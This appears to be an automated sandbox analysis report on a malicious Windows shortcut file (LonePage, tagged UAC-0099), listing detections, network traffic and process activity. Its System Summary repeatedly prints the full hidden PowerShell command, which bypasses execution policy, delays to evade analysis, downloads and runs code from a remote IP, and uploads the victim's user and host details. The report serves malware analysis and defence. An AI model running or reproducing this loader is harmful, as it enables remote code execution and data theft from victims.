Windows Analysis Report
140AEcuVy7.lnk

Overview

General Information

Sample name:	140AEcuVy7.lnk renamed because original name is a hash value
Original sample name:	0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51.lnk
Analysis ID:	1522697
MD5:	64752d058e5829210a0f407fb912c9d3
SHA1:	4e8a0cfb784a6f93f8974b4f11679786cef86bb7
SHA256:	0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51
Tags:	lnkUAC-0099user-JAMESWT_MHT
Infos:

Detection

LonePage

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected LonePage

AI detected suspicious sample

Bypasses PowerShell execution policy

Connects to many ports of the same IP (likely port scanning)

Encrypted powershell cmdline option found

Found suspicious powershell code related to unpacking or dynamic code loading

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Suspicious execution chain found

Suspicious powershell command line found

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: 140AEcuVy7.lnk

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.4% probability

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\Z:\syscalls\amsi64_7332.amsi.csve.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79727000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3415629273.000001DE5F8CD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dbpdbtem.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.Core.pdb;+O source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbo1 source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *on.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 2.59.222.98 ports 43820,0,2,3,4,8

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 58056 -> 43820
Source: unknown	Network traffic detected: HTTP traffic on port 58057 -> 43820

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:58056 -> 2.59.222.98:43820

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1Host: 2.59.222.98:43820Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1Host: 2.59.222.98:43820Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 23.41.168.139 23.41.168.139

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ONEHOSTPLANETUA ONEHOSTPLANETUA

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT

Source: unknown	TCP traffic detected without corresponding DNS query: 23.41.168.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.41.168.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.41.168.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.41.168.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.41.168.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.41.168.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.41.168.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.41.168.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.41.168.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.41.168.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.41.168.139
Source: unknown	TCP traffic detected without corresponding DNS query: 2.59.222.98
Source: unknown	TCP traffic detected without corresponding DNS query: 2.59.222.98
Source: unknown	TCP traffic detected without corresponding DNS query: 2.59.222.98
Source: unknown	TCP traffic detected without corresponding DNS query: 2.59.222.98
Source: unknown	TCP traffic detected without corresponding DNS query: 2.59.222.98
Source: unknown	TCP traffic detected without corresponding DNS query: 2.59.222.98
Source: unknown	TCP traffic detected without corresponding DNS query: 2.59.222.98
Source: unknown	TCP traffic detected without corresponding DNS query: 2.59.222.98
Source: unknown	TCP traffic detected without corresponding DNS query: 2.59.222.98
Source: unknown	TCP traffic detected without corresponding DNS query: 2.59.222.98
Source: unknown	TCP traffic detected without corresponding DNS query: 2.59.222.98
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic	HTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1Host: 2.59.222.98:43820Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1Host: 2.59.222.98:43820Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: x1.i.lencr.org

Source: powershell.exe, 00000010.00000002.4548213654.00000107F8450000.00000004.00000020.00020000.00000000.sdmp, Recorded.vbs.0.dr	String found in binary or memory: http://2.59.222.98:28402/page107
Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.59.222.98:28402/page107Bytestf8.GetBytesesX
Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.59.222.98:28402/page107X
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.59.222.98:43820
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62A2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.59.222.98:43820(
Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.59.222.98:43820/KfngnHb
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.59.222.98:43820/KfngnHbx
Source: powershell.exe, 00000010.00000002.4548213654.00000107F8450000.00000004.00000020.00020000.00000000.sdmp, Recorded.vbs.0.dr	String found in binary or memory: http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt
Source: powershell.exe, 00000006.00000002.3416550367.000001DE5FA85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt
Source: powershell.exe, 00000006.00000002.3475796002.000001DE79A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m1
Source: svchost.exe, 00000009.00000002.3748403757.0000027DAD800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.9.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078005E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: edb.log.9.dr, qmgr.db.9.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000009.00000003.2101982072.0000027DAD750000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.3417701270.000001DE620D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078055F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.9.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 6496, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn\|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn\|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn\|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn\|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3389	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2674	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5378	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4336	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4298
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5470

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4068	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -598577s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7648	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7648	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412	Thread sleep time: -22136092888451448s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: svchost.exe, 00000009.00000002.3747955096.0000027DA822B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3748521397.0000027DAD855000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\document.pdf"	Jump to behavior
